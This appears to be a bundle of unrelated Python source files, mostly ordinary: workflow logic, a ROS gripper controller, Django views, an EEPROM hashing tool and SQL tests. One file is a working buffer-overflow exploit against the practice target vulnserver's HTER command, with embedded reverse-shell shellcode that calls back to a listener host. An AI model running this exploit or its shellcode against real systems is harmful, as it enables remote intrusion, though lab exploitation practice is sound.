self.logger = None
cls = self.__class__
result = cls.__new__(cls)
memo[id(self)] = result
# Deep copy all other attributes
for k, v in self.__dict__.items():
setattr(result, k, copy.deepcopy(v, memo))
self.logger = logger
result.logger = logger
return result
@property
def metadata(self):
run_metadata = {'parent_num_run': self.parent_num_run,
'num_run': self._num_run,
'runs': {}}
for run_id in self.runs:
run_metadata['runs'][run_id] = self.runs[run_id].metadata
if not self.runs:
run_metadata['parameter_links'] = self.template.get_parameter_links_metadata()
return run_metadata
@metadata.setter
def metadata(self, value):
run_metadata = value
self.parent_num_run = run_metadata['parent_num_run']
self._num_run = run_metadata['num_run']
runs = run_metadata['runs']
if not runs and 'parameter_links' in run_metadata:
parameter_links = run_metadata['parameter_links']
self.template.set_parameter_links_metadata(parameter_links)
for run_id in runs:
self.runs[run_id] = self.template.copy()
self.runs[run_id].metadata = runs[run_id]
# self.add_metadata_item('runs', )
@property
def independent_works(self):
if self.runs:
return self.runs[str(self.num_run)].independent_works
return self.template.independent_works
@independent_works.setter
def independent_works(self, value):
if self.runs:
self.runs[str(self.num_run)].independent_works = value
self.template.independent_works = value
@property
def last_updated_at(self):
if self.runs:
return self.runs[str(self.num_run)].last_updated_at
return None
@last_updated_at.setter
def last_updated_at(self, value):
if self.runs:
self.runs[str(self.num_run)].last_updated_at = value
@property
def name(self):
return self.template.name
@name.setter
def name(self, value):
self.template.name = value
@property
def username(self):
return self.template.username
@username.setter
def username(self, value):
self.template.username = value
@property
def userdn(self):
return self.template.userdn
@userdn.setter
def userdn(self, value):
self.template.userdn = value
@property
def lifetime(self):
return self.template.lifetime
@lifetime.setter
def lifetime(self, value):
self.template.lifetime = value
@property
def num_run(self):
if self.parent_num_run:
return self.parent_num_run * 100 + self._num_run
return self._num_run
@num_run.setter
def num_run(self, value):
if self.parent_num_run:
self._num_run = value - self.parent_num_run * 100
else:
self._num_run = value
@property
def transforming(self):
if self.runs and str(self.num_run) in self.runs:
return True
return False
@transforming.setter
def transforming(self, value):
if self._num_run < 1:
self._num_run = 1
if str(self.num_run) not in self.runs:
self.runs[str(self.num_run)] = self.template.copy()
if self.runs[str(self.num_run)].has_loop_condition():
self.runs[str(self.num_run)].num_run = self.num_run
if self._num_run > 1:
p_metadata = self.runs[str(self.num_run - 1)].get_metadata_item('parameter_links')
self.runs[str(self.num_run)].add_metadata_item('parameter_links', p_metadata)
def set_workload_id(self, workload_id):
if self.runs:
self.runs[str(self.num_run)].workload_id = workload_id
else:
self.template.workload_id = workload_id
# self.dynamic.workload_id = workload_id
def get_internal_id(self):
if self.runs:
return self.runs[str(self.num_run)].get_internal_id()
return self.template.get_internal_id()
def get_workload_id(self):
if self.runs:
return self.runs[str(self.num_run)].workload_id
return self.template.workload_id
def add_work(self, work, initial=False, primary=False):
self.template.add_work(work, initial, primary)
def add_condition(self, cond):
self.template.add_condition(cond)
def add_parameter_link(self, work_source, work_destinations, parameter_link):
self.template.add_parameter_link(work_source, work_destinations, parameter_link)
def find_workflow_from_work(self, work):
return self.template.find_workflow_from_work(work)
def find_parameter_links_from_id(self, internal_id):
if self.runs:
return self.runs[str(self.num_run)].find_parameter_links_from_id(internal_id)
return self.template.find_parameter_links_from_id(internal_id)
def refresh_parameter_links(self):
if self.runs:
self.runs[str(self.num_run)].refresh_parameter_links()
def set_global_parameters(self, value):
self.template.set_global_parameters(value)
def sync_global_parameters_from_work(self, work):
if self.runs:
return self.runs[str(self.num_run)].sync_global_parameters_from_work(work)
return self.template.sync_global_parameters_from_work(work)
def get_new_works(self):
self.sync_works()
if self.runs:
return self.runs[str(self.num_run)].get_new_works()
return []
def get_current_works(self):
self.sync_works()
if self.runs:
return self.runs[str(self.num_run)].get_current_works()
return []
def get_all_works(self):
self.sync_works()
if self.runs:
return self.runs[str(self.num_run)].get_all_works()
return []
def get_primary_initial_collection(self):
if self.runs:
return self.runs[str(self.num_run)].get_primary_initial_collection()
return self.template.get_primary_initial_collection()
def resume_works(self):
if self.runs:
self.runs[str(self.num_run)].resume_works()
def clean_works(self):
# if self.runs:
# self.runs[str(self.num_run)].clean_works()
self.parent_num_run = None
self._num_run = 0
self.runs = {}
def is_to_expire(self, expired_at=None, pending_time=None, request_id=None):
if self.runs:
return self.runs[str(self.num_run)].is_to_expire(expired_at=expired_at, pending_time=pending_time, request_id=request_id)
return False
def is_terminated(self):
if self.runs:
if self.runs[str(self.num_run)].is_terminated():
if not self.runs[str(self.num_run)].has_loop_condition() or not self.runs[str(self.num_run)].get_loop_condition_status():
return True
return False
def is_finished(self):
if self.is_terminated():
return self.runs[str(self.num_run)].is_finished()
return False
def is_subfinished(self):
if self.is_terminated():
return self.runs[str(self.num_run)].is_subfinished()
return False
def is_failed(self):
if self.is_terminated():
return self.runs[str(self.num_run)].is_failed()
return False
def is_expired(self):
if self.is_terminated():
return self.runs[str(self.num_run)].is_expired()
return False
def is_cancelled(self):
if self.is_terminated():
return self.runs[str(self.num_run)].is_cancelled()
return False
def is_suspended(self):
if self.is_terminated():
return self.runs[str(self.num_run)].is_suspended()
return False
def get_terminated_msg(self):
if self.is_terminated():
return self.runs[str(self.num_run)].get_terminated_msg()
return None
def get_status(self):
if not self.runs:
return WorkStatus.New
if not self.is_terminated():
return WorkStatus.Transforming
return self.runs[str(self.num_run)].get_status()
def depend_on(self, work):
return self.template.depend_on(work)
def add_proxy(self):
self.template.add_proxy()
def get_proxy(self):
self.template.get_proxy()
def add_loop_condition(self, condition, position='end'):
if not position or position != 'begin':
position = 'end'
position = 'end' # force position to end currently. position = 'begin' is not supported now.
self.template.add_loop_condition(condition, position=position)
self.loop_condition_position = position
def refresh_works(self):
if self.runs:
self.runs[str(self.num_run)].refresh_works()
def sync_works(self):
# position is end.
if self._num_run < 1:
self._num_run = 1
if str(self.num_run) not in self.runs:
self.runs[str(self.num_run)] = self.template.copy()
if self.runs[str(self.num_run)].has_loop_condition():
self.runs[str(self.num_run)].num_run = self._num_run
if self._num_run > 1:
p_metadata = self.runs[str(self.num_run - 1)].get_metadata_item('parameter_links')
self.runs[str(self.num_run)].add_metadata_item('parameter_links', p_metadata)
self.runs[str(self.num_run)].sync_works()
if self.runs[str(self.num_run)].is_terminated():
if self.runs[str(self.num_run)].has_loop_condition():
if self.runs[str(self.num_run)].get_loop_condition_status():
self._num_run += 1
self.runs[str(self.num_run)] = self.template.copy()
self.runs[str(self.num_run)].num_run = self._num_run
p_metadata = self.runs[str(self.num_run - 1)].get_metadata_item('parameter_links')
self.runs[str(self.num_run)].add_metadata_item('parameter_links', p_metadata)
def get_relation_map(self):
if not self.runs:
return []
if self.template.has_loop_condition():
rets = {}
for run in self.runs:
rets[run] = self.runs[run].get_relation_map()
return [rets]
else:
return self.runs[str(self.num_run)].get_relation_map()
class SubWorkflow(Workflow):
def __init__(self, name=None, workload_id=None, lifetime=None, pending_time=None, logger=None):
# Init a workflow.
super(SubWorkflow, self).__init__(name=name, workload_id=workload_id, lifetime=lifetime, pending_time=pending_time, logger=logger)
class LoopWorkflow(Workflow):
def __init__(self, name=None, workload_id=None, lifetime=None, pending_time=None, logger=None):
# Init a workflow.
super(LoopWorkflow, self).__init__(name=name, workload_id=workload_id, lifetime=lifetime, pending_time=pending_time, logger=logger)
|
#!/usr/bin/env python3
import rospy
from onrobot_vg_msgs.msg import OnRobotVGOutput
def genCommand(char, command):
"""Updates the command according to the character entered by the user."""
if char == 'g':
command.rMCA = 0x0100
command.rVCA = 255
command.rMCB = 0x0100
command.rVCB = 255
if char == 'r':
command.rMCA = 0x0000
command.rVCA = 0
command.rMCB = 0x0000
command.rVCB = 0
if char == 'ga':
command.rMCA = 0x0100
command.rVCA = 255
if char == 'ra':
command.rMCA = 0x0000
command.rVCA = 0
if char == 'gb':
command.rMCB = 0x0100
command.rVCB = 255
if char == 'rb':
command.rMCB = 0x0000
command.rVCB = 0
# If the command entered is a int, assign this value to r
try:
if int(char) == 0:
command.rMCA = 0x0000
command.rVCA = 0
command.rMCB = 0x0000
command.rVCB = 0
else:
command.rMCA = 0x0100
command.rVCA = min(255, int(char))
command.rMCB = 0x0100
command.rVCB = min(255, int(char))
except ValueError:
pass
return command
def askForCommand(command):
"""Asks the user for a command to send to the gripper."""
currentCommand = 'Simple OnRobot VG Controller\n-----\nCurrent command:'
currentCommand += ' rMCA = ' + str(command.rMCA)
currentCommand += ', rVCA = ' + str(command.rVCA)
currentCommand += ', rMCB = ' + str(command.rMCB)
currentCommand += ', rVCB = ' + str(command.rVCB)
rospy.loginfo(currentCommand)
strAskForCommand = '-----\nAvailable commands\n\n'
strAskForCommand += 'g: Turn on all channels\n'
strAskForCommand += 'r: Turn off all channels\n'
strAskForCommand += 'ga: Turn on channel A\n'
strAskForCommand += 'ra: Turn off channel A\n'
strAskForCommand += 'gb: Turn on channel B\n'
strAskForCommand += 'rb: Turn off channel B\n'
strAskForCommand += '(0 - 255): Set vacuum power for all channels\n'
strAskForCommand += '-->'
return input(strAskForCommand)
def publisher():
"""Main loop which requests new commands and
publish them on the OnRobotVGOutput topic.
"""
rospy.init_node('OnRobotVGSimpleController', log_level=rospy.DEBUG)
pub = rospy.Publisher('OnRobotVGOutput', OnRobotVGOutput, queue_size=1)
command = OnRobotVGOutput()
while not rospy.is_shutdown():
command = genCommand(askForCommand(command), command)
pub.publish(command)
rospy.sleep(0.1)
if __name__ == '__main__':
publisher()
|
# DESAFIO 052
# Faça um programa que leia um número inteiro e diga se ele é ou não um número primo.
num = int(input('Digite um número: '))
total = 0
for c in range(1, num + 1):
if num % c == 0:
print(c, end=' ')
total += 1
if total == 2:
print(f'\nO número {num} é um NÚMERO PRIMO')
else:
print(f'\nO número {num} NÃO é um NÚMERO PRIMO')
|
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from flask import Flask, make_response, render_template, request
# Import the helper functions
from identitytoolkit import gitkitclient
app = Flask(__name__)
app.debug = True
# Import the configuration file you downloaded from Google Developer Console
gitkit_instance = gitkitclient.GitkitClient.FromConfigFile(
'gitkit-server-config.json')
@app.route("/", methods=['GET', 'POST'])
def index():
text = "You are not signed in."
# Check for and read the Google Identity Toolkit token if present
if 'gtoken' in request.cookies:
gitkit_user = gitkit_instance.VerifyGitkitToken(request.cookies['gtoken'])
if gitkit_user:
text = "Welcome " + gitkit_user.email + "! Your user info is: " + str(vars(gitkit_user))
response = make_response(render_template('index.html', CONTENT=text))
response.headers['Content-Type'] = 'text/html'
return response
@app.route("/widget", methods=['GET', 'POST'])
def signInPage():
response = make_response(render_template('widget.html'))
# OPTIONAL (only for Yahoo support): Take information sent by POST request to the sign-in-page and forward it to the Javascript
#post_body = ''
#if request.method == 'POST':
# post_body = urlencode(request.data)
#response = make_response(render_template('sign-in-page.html',
# POST_BODY=post_body))
response.headers['Content-Type'] = 'text/html'
return response
if __name__ == "__main__":
app.run(port=8000)
|
from typing import Tuple, List, Optional
import torch
import numpy as np
from colorama import Fore
from texrel import things
class Grid(object):
"""
first coordinate is row, top to bottom; second is column, left to right
"""
def __init__(self, size):
self.size = size
self.grid: List[List[Optional[things.ShapeColor]]] = []
for i in range(size):
row = []
for j in range(size):
row.append(None)
self.grid.append(row)
self.objects_set = []
def __eq__(self, b: object) -> bool:
if not isinstance(b, self.__class__):
return False
return self.grid == b.grid
def add_object(self, pos: Tuple[int, int], o: things.ShapeColor):
assert self.grid[pos[0]][pos[1]] is None
self.grid[pos[0]][pos[1]] = o
self.objects_set.append(o)
return self
def get_pos_for_object(self, o: things.ShapeColor) -> Tuple[int, int]:
"""
warning: slow
first coordinate is y (ie vert), second coordinate is x (ie horiz)
(this is mostly historical, because of how __repr__ function works,
not sure I agree with this in hindsight...)
"""
for i in range(self.size):
for j in range(self.size):
if self.grid[i][j] == o:
return (i, j)
raise ValueError()
def as_shape_color_tensors(self) -> Tuple[torch.Tensor, torch.Tensor]:
shapes = torch.zeros((self.size, self.size), dtype=torch.int64)
colors = torch.zeros((self.size, self.size), dtype=torch.int64)
for i in range(self.size):
for j in range(self.size):
o: Optional[things.ShapeColor] = self.grid[i][j]
if o is None:
continue
shapes[i, j] = o.shape + 1
colors[i, j] = o.color + 1
return shapes, colors
def __repr__(self) -> str:
res_l = []
for i in range(self.size):
row = ''
for j in range(self.size):
o = self.grid[i][j]
if o is None:
row += '.'
else:
fore_color = things._colors[o.color]
row += fore_color
row += things._shapes[o.shape]
row += Fore.RESET
res_l.append(row)
return '\n'.join(res_l)
def render(self) -> None:
print(str(self))
def generate_available_pos(self, r: np.random.RandomState) -> Tuple[int, int]:
"""
returns a pos which is None at that position in the grid
"""
pos = None
while pos is None or self.grid[pos[0]][pos[1]] is not None:
pos = r.choice(self.size, 2, replace=True)
pos = tuple(pos)
return pos
|
import socket
import struct
import time
import binascii
print "\nExploitation of HTER Command - Exploit (Reverse Shell)\n"
ip_addr = '192.168.199.130'
port = 9999
# send evil buffer to vulnserver
def send_evil_buffer(evil_buffer):
did_send = False
command = evil_buffer[:5]
print "Sending buffer of length %s to command %s" % (len(evil_buffer), command)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((ip_addr, int(port)))
except Exception as e:
print "[-] Failed to connect to service %s" % e
else:
print "[+] Connected to server"
# Get banner response
data = s.recv(1024)
print(data)
bytes_sent = s.send(evil_buffer)
print "Sent %s bytes" % bytes_sent
if bytes_sent > 0:
did_send = True
finally:
s.close()
return did_send
###############################################################################
# JMP EAX from essfunc.dll
# 625011B1 FFE0 JMP EAX
jmp_eax = binascii.hexlify(struct.pack("<I", 0x625011B1))
# msfpayload windows/shell_reverse_tcp LHOST=192.168.199.128 LPORT=4444 EXITFUN=NONE R | msfencode -b '\x00' -t raw > rshell.bin
# hexdump -C rshell.bin | grep -v 00000155 | cut -d" " -f 3-19 | sed -e 's/ //g' | tr -d '\n'
shellcode = "bac1c97739d9cbd97424f45e2bc9b14f31561483eefc035610233c8bd12abf74224c4991135e2dd1066e25b7aa056b2c386ba44389c1926a0ae41a20c867e73b1d47d6f350861fe99bdac86509ca7d3b92eb5137aa93d4885f29d6d8f02690c07b6001f0a8737dbbc547f53a0c96f60c7074c9a07d850d069ef065742302be06ff8723a0743f805058d9435e15ae0c43a863277f2182e80971a02c5121c9753f84f666e77952ec0a6de4af4242da4f93cc6d23a153c5ab891cc32ced36b3a310b9c3ead6ed9384ff8d7855ff5b2e05af338ef50fe4661c80db961f4a6a9188b5c5dac95e14e4d8c29102b0eaf79d2d925d55cf5b48fd6cc917fdfbf28faaacc5d93e417f705c9819bbe447da42e50a6661f5d2672da18a31fb1f6de84dc92747049dbeab97dbbee161030e5c343cbf08b045dda83f9c65d875bccc71d0554d1ce380921960206bde78416e9a3eba02b3aabcb1b4fe"
# the various 90 sleds are to help ensure the PUSH EAX and POP ESP are placed correctly
# and to account for the required 2041 bytes needed to successfully control EIP
shellcode_buffer = '0' + '90'*20 + '505C' + '909090' + '90'*(20) + '9090909090' + shellcode + 'A'*(2040 - 100 - len(shellcode))
print "Shellcode buffer length: %s" % len(shellcode_buffer)
evil_buffer = "HTER " + shellcode_buffer + jmp_eax + 'C' *950
send_evil_buffer(evil_buffer)
|
from celerie_queue.tasks import addTime
import time
if __name__ == '__main__':
for i in range(5):
result = addTime.delay(i)
print('Taking result: ', result)
|
import json
import logging
import time
from django.conf import settings
from django.http import HttpResponse
from django.template.response import TemplateResponse
from django.views.decorators.csrf import csrf_exempt
from rest_framework import viewsets, permissions
from rest_framework.exceptions import NotFound, ValidationError
from rest_framework.generics import ListCreateAPIView, RetrieveAPIView
from rest_framework.response import Response
from rest_framework.views import APIView
from manager.credential_workflow import (
connection_invitation_accept,
credential_offer_create,
credential_offer_accept,
is_credential_request_ready,
connection_invitation_create,
)
from manager.models import (
Schema,
CredentialDefinition,
CredentialRequest,
ConnectionInvitation,
CredentialOffer,
)
from manager.serializers import (
SchemaSerializer,
CredentialDefinitionSerializer,
CredentialRequestSerializer,
)
from manager.utils import EmailHelper
LOGGER = logging.getLogger(__name__)
class SchemaViewSet(viewsets.ModelViewSet):
serializer_class = SchemaSerializer
permission_classes = (permissions.IsAuthenticated,)
queryset = Schema.objects.all()
def perform_create(self, serializer):
serializer.save(creator=self.request.user)
class CredentialDefinitionViewSet(viewsets.ModelViewSet):
serializer_class = CredentialDefinitionSerializer
permission_classes = (permissions.IsAuthenticated,)
queryset = CredentialDefinition.objects.all()
def perform_create(self, serializer):
serializer.save(creator=self.request.user)
class CredentialRequestRetrieveAPIView(RetrieveAPIView):
serializer_class = CredentialRequestSerializer
permission_classes = (permissions.IsAuthenticated,)
queryset = CredentialRequest.objects.all()
class CredentialRequestListCreateAPIView(ListCreateAPIView):
serializer_class = CredentialRequestSerializer
permission_classes = (permissions.IsAuthenticated,)
queryset = CredentialRequest.objects.all()
def perform_create(self, serializer):
serializer.save(creator=self.request.user)
invitation_url = serializer.instance.invitation_url
LOGGER.debug(f"*** Obtain credential url: {invitation_url}")
EmailHelper.send(
serializer.instance.email,
template="invitation",
context={
"credential_name": serializer.instance.credential_definition.name,
"invitation_url": invitation_url,
},
)
class StepCheckAPIView(APIView):
model_class = None
authentication_classes = ()
permission_classes = ()
def get(self, request, format=None):
code = request.query_params.get("code")
model = self.model_class.objects.filter(credential_request__code=code).order_by("-created").first()
if not model:
raise NotFound()
if not model.accepted:
raise ValidationError({"detail": "Not accepted yet"})
return Response()
class ConnectionCheck(StepCheckAPIView):
model_class = ConnectionInvitation
class CredentialCheck(StepCheckAPIView):
model_class = CredentialOffer
def credential_obtain(request):
template_name = "credential_obtain.html"
code = request.GET.get("code")
try:
credential_request = is_credential_request_ready(code)
except Exception as e:
LOGGER.error(f"obtain_credential: code:{code} - error: {e}")
return TemplateResponse(request, template_name, {"error": "Invalid code"})
invitation_url, invitation_b64 = "", ""
connection_invitations = credential_request.connection_invitations.order_by("-created")
if not connection_invitations or not connection_invitations[0].accepted:
invitation_url, invitation_b64 = connection_invitation_create(credential_request)
return TemplateResponse(
request,
template_name,
{
"invitation_url": invitation_url,
"invitation_b64": invitation_b64,
"poll_interval": settings.POLL_INTERVAL,
"poll_max_tries": settings.POLL_MAX_TRIES,
"poll_connection_url": credential_request.connection_invitation_polling_url,
"poll_credential_url": credential_request.credential_offer_polling_url,
},
)
@csrf_exempt
def webhooks(request, topic):
# TODO: validate 'secret' key
try:
message = json.loads(request.body)
state = message.get("state")
LOGGER.info(f"webhook: received: topic: '{topic}' - state: '{state}' - message: {message}")
if topic == "connections" and state == "response":
connection_id = message.get("connection_id")
try:
connection_invitation = connection_invitation_accept(connection_id)
if connection_invitation:
LOGGER.info(f"webhook: processing: connection accepted - connection_id: {connection_id}")
time.sleep(5)
credential_offer_create(connection_id, connection_invitation)
else:
LOGGER.error(f"webhook: connection_invitation_accept: connection_id: {connection_id} not found")
except Exception as e:
LOGGER.error(f"webhook: connection_accepted: connection_id: {connection_id} - error: {e}")
elif topic == "issue_credential" and state == "credential_issued":
connection_id = message.get("connection_id")
try:
accepted_credential_offer = credential_offer_accept(connection_id)
if accepted_credential_offer:
LOGGER.info(f"webhook: processing: credential accepted - connection_id: {connection_id}")
else:
LOGGER.error(f"webhook: credential_offer_accept: connection_id: {connection_id} not found")
except Exception as e:
LOGGER.error(f"webhook: issue_credential: connection_id: {connection_id} - error: {e}")
else:
LOGGER.info(f"webhook: topic: {topic} and state: {state} is invalid")
except Exception as e:
LOGGER.info(f"webhook: {topic} : bad request: '{request.body}' - {e}")
return HttpResponse()
|
# -*- coding: utf-8 -*-
"""SimpleStockPlot.ipynb"""
import matplotlib.pyplot as plt
import yfinance as yf
data = yf.download('tsla', '2020-10-10', '2020-10-20')
data.Close.plot(marker='o')
|
# @file
# Hashes the EEPROM binary.
#
# Copyright (c) 2015 - 2018, Intel Corporation. All rights reserved.<BR>
#
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php.
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
import os
import struct
import subprocess
import sys
import zlib
# Version defines
__version__ = '0.1.0.1'
VerString = 'EEPROM hash generator, Version #{0}'.format(__version__)
# The following defines are based off of EEPROM layout version #1.00
# We could parse the definition file for these values
BinaryLengthOffset = 0x10
Crc32Offset = 0x14
Crc32LengthOffset = 0x18
HashTypeOffset = 0x10
PromSigStructSize = 0x20
StructureLengthOffset = 0x0C
# The following defines are based off of EEPROM layout version #1.00
# We cannot parse the definition file for these values
HashTypeNone = 0x0000
HashTypeMD5 = 0x0001
HashTypeSHA1 = 0x0002
HashTypeSHA256 = 0x0003
HashTypeSHA384 = 0x0004
HashTypeSHA512 = 0x0005
HashTypeSigningFlag = 0x8000
# Hash digest size defines
MD5DigestSize = 0x10
SHA1DigestSize = 0x14
SHA256DigestSize = 0x20
SHA384DigestSize = 0x30
SHA512DigestSize = 0x40
def CopyFile(Destination, Source, Size):
count = 0
while count < Size:
Destination.write(Source.read(1))
count += 1
return
def Crc32File(File):
CurrentLocation = File.tell()
File.seek (0)
returnValue = (zlib.crc32(File.read()) & 0xFFFFFFFF)
File.seek (CurrentLocation)
return returnValue
def FindStructure(File, Structure):
CurrentLocation = File.tell()
offset = 0
fileSize = GetFileLength(File)
while offset < fileSize:
File.seek(offset)
Signature = struct.unpack('8s', File.read(8))[0]
if Signature == Structure:
return offset
offset += 0x10
File.seek(CurrentLocation)
return fileSize
def GetFileLength(File):
CurrentLocation = File.tell()
File.seek(0, os.SEEK_END)
FileLength = File.tell()
File.seek(CurrentLocation)
return FileLength
def Main():
# Set error return code
ReturnCode = 1
try:
# Set OpenSSL path
OpenSslPath = sys.argv[1]
# Open file for reading, modifying, and in binary mode
BinaryFileName = sys.argv[2]
BinaryFile = open(BinaryFileName, 'r+b')
# Get file length
BinaryFileLength = GetFileLength(BinaryFile)
# Find $PromSig
SignatureLocation = FindStructure(BinaryFile, "$PromSig")
if SignatureLocation == BinaryFileLength:
# Failed to find structure. Bail after printing warning.
print ('WARNING: Failed to find $PromSig structure in {0}'.format(BinaryFileName))
return ReturnCode
# Determine which hashing algorithm to use
BinaryFile.seek(SignatureLocation + HashTypeOffset)
FileHashSize = 0
FileSigSize = 0
HashType = struct.unpack('H', BinaryFile.read(2))[0]
HashingType = ''
SigningFlag = HashType & HashTypeSigningFlag
HashType &= 0x7FFF
if HashType == HashTypeNone:
FileHashSize = 0x00
print('- Nothing to hash. Bailing...')
return ReturnCode
elif HashType == HashTypeMD5:
# MD5 hashing
FileHashSize = MD5DigestSize
HashingType = '-md5'
print('- MD5 hash requested.')
elif HashType == HashTypeSHA1:
# SHA1 hashing
FileHashSize = SHA1DigestSize
HashingType = '-sha1'
print('- SHA1 hash requested.')
elif HashType == HashTypeSHA256:
# SHA256 hashing
FileHashSize = SHA256DigestSize
HashingType = '-sha256'
print('- SHA256 hash requested.')
elif HashType == HashTypeSHA384:
# SHA384 hashing
FileHashSize = SHA384DigestSize
HashingType = '-sha384'
print('- SHA384 hash requested.')
elif HashType == HashTypeSHA512:
# SHA512 hashing
FileHashSize = SHA512DigestSize
HashingType = '-sha512'
print('- SHA512 hash requested.')
else:
print('ERROR: Invalid hash type requested!')
return 1
if SigningFlag == HashTypeSigningFlag:
print('- signing requested.')
if HashType == HashTypeSHA384:
print('ERROR: OpenSSL does not currently support signing SHA384!')
return 1
if HashType == HashTypeSHA512:
print('ERROR: OpenSSL does not currently support signing SHA512!')
return 1
if len (sys.argv) != 4:
print('ERROR: Missing OpenSSL generated private key PEM file!')
return 1
PrivateKeyFileName = sys.argv[3]
FileSigSize = 256
# Update $PromSig.Length
PromSigLength = PromSigStructSize + FileHashSize + FileSigSize
BinaryFile.seek(SignatureLocation + StructureLengthOffset)
WriteBinary(BinaryFile, PromSigLength, 0x04)
# Update $Eeprom$.CrcLength
HeaderLocation = FindStructure(BinaryFile, "$Eeprom$")
if HeaderLocation != 0x00:
print('ERROR: $Eeprom$ structure is not at the beginning of the file!')
return 1
BinaryFile.seek(HeaderLocation + BinaryLengthOffset)
Crc32Length = BinaryFile.read(4)
BinaryFile.seek(HeaderLocation + Crc32LengthOffset)
BinaryFile.write(Crc32Length)
# Update $Eeprom$.Length
BinaryFile.seek(HeaderLocation + BinaryLengthOffset)
WriteBinary(BinaryFile, BinaryFileLength + FileHashSize + FileSigSize, 0x04)
# Update EEPROM header CRC32
HeaderLocation = FindStructure(BinaryFile, "$Eeprom$")
if HeaderLocation != 0x00:
print('ERROR: $Eeprom$ structure is not at the beginning of the file!')
return 1
BinaryFile.seek(HeaderLocation + Crc32Offset)
WriteBinary(BinaryFile, 0x0000, 0x04)
Crc32 = Crc32File(BinaryFile)
print('- CRC32 = {0:08X}'.format (Crc32))
BinaryFile.seek(HeaderLocation + Crc32Offset)
WriteBinary(BinaryFile, Crc32, 0x04)
# Close the file so OpenSSL can get to it
BinaryFile.close()
# Hash the file
subprocess.call([OpenSslPath, 'dgst', HashingType, '-binary', '-out', 'hash.tmp', BinaryFileName])
# Sign the file
if SigningFlag == HashTypeSigningFlag:
subprocess.call([OpenSslPath, 'dgst', HashingType, '-sign', PrivateKeyFileName, '-out', 'sign.tmp', BinaryFileName])
# Add hash to end of the file
HashFile = open('hash.tmp', 'r+b')
BinaryFile = open(BinaryFileName, 'r+b')
BinaryFile.seek(GetFileLength (BinaryFile))
CopyFile(BinaryFile, HashFile, FileHashSize)
BinaryFile.close()
HashFile.close()
os.remove('hash.tmp')
# Add signed hash to end of the file
if SigningFlag == HashTypeSigningFlag:
SignatureFile = open('sign.tmp', 'r+b')
BinaryFile = open(BinaryFileName, 'r+b')
BinaryFile.seek(GetFileLength (BinaryFile))
CopyFile(BinaryFile, SignatureFile, FileSigSize)
BinaryFile.close()
SignatureFile.close()
os.remove('sign.tmp')
# Align file size to paragraphs
BinaryFile = open(BinaryFileName, 'r+b')
BinaryFileLength = GetFileLength(BinaryFile)
AlignmentSize = 0x10 - (BinaryFileLength % 0x10)
if AlignmentSize < 0x10:
BinaryFile.seek(BinaryFileLength)
WriteBinary(BinaryFile, 0x0000, AlignmentSize)
# Clear return code
ReturnCode = 0
finally:
# Close file
BinaryFile.close()
return ReturnCode
def WriteBinary(File, binary, Size):
count = 0
value = binary
while count < Size:
count += 1
# Just want the low byte
temp = value & 0xFF
# Shift right a byte
value >>= 8
# Write the low byte out
File.write(str(chr (temp)))
if __name__ == "__main__":
print('')
print(VerString)
sys.exit(Main())
|
# Generated by Django 4.0 on 2021-12-12 07:20
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('api', '0004_alter_purchasehistory_product_alter_tag_product'),
]
operations = [
migrations.AddField(
model_name='purchasehistory',
name='purchase_date',
field=models.DateField(default=django.utils.timezone.now),
),
]
|
from __future__ import absolute_import, division, print_function
import pytest
from blaze.compute.sql import compute, computefull, select
from blaze import SQL
from blaze.expr import *
import sqlalchemy
import sqlalchemy as sa
from blaze.compatibility import xfail
from blaze.utils import unique
t = TableSymbol('t', '{name: string, amount: int, id: int}')
metadata = sa.MetaData()
s = sa.Table('accounts', metadata,
sa.Column('name', sa.String),
sa.Column('amount', sa.Integer),
sa.Column('id', sa.Integer, primary_key=True),
)
tbig = TableSymbol('tbig', '{name: string, sex: string[1], amount: int, id: int}')
sbig = sa.Table('accountsbig', metadata,
sa.Column('name', sa.String),
sa.Column('sex', sa.String),
sa.Column('amount', sa.Integer),
sa.Column('id', sa.Integer, primary_key=True),
)
def normalize(s):
return ' '.join(s.strip().split())
def test_table():
result = str(computefull(t, s))
expected = """
SELECT accounts.name, accounts.amount, accounts.id
FROM accounts
""".strip()
assert normalize(result) == normalize(expected)
def test_projection():
print(compute(t[['name', 'amount']], s))
assert str(compute(t[['name', 'amount']], s)) == \
str(sa.select([s.c.name, s.c.amount]))
def test_eq():
assert str(compute(t['amount'] == 100, s)) == str(s.c.amount == 100)
def test_selection():
assert str(compute(t[t['amount'] == 0], s)) == \
str(sa.select([s]).where(s.c.amount == 0))
assert str(compute(t[t['amount'] > 150], s)) == \
str(sa.select([s]).where(s.c.amount > 150))
def test_arithmetic():
assert str(computefull(t['amount'] + t['id'], s)) == \
str(sa.select([s.c.amount + s.c.id]))
assert str(compute(t['amount'] + t['id'], s)) == str(s.c.amount + s.c.id)
assert str(compute(t['amount'] * t['id'], s)) == str(s.c.amount * s.c.id)
assert str(computefull(t['amount'] + t['id'] * 2, s)) == \
str(sa.select([s.c.amount + s.c.id * 2]))
def test_join():
metadata = sa.MetaData()
lhs = sa.Table('amounts', metadata,
sa.Column('name', sa.String),
sa.Column('amount', sa.Integer))
rhs = sa.Table('ids', metadata,
sa.Column('name', sa.String),
sa.Column('id', sa.Integer))
expected = lhs.join(rhs, lhs.c.name == rhs.c.name)
expected = select(list(unique(expected.columns, key=lambda c:
c.name))).select_from(expected)
L = TableSymbol('L', '{name: string, amount: int}')
R = TableSymbol('R', '{name: string, id: int}')
joined = join(L, R, 'name')
result = compute(joined, {L: lhs, R: rhs})
assert str(result) == str(expected)
assert str(select(result)) == str(select(expected))
# Schemas match
assert list(result.c.keys()) == list(joined.columns)
def test_multi_column_join():
metadata = sa.MetaData()
lhs = sa.Table('aaa', metadata,
sa.Column('x', sa.Integer),
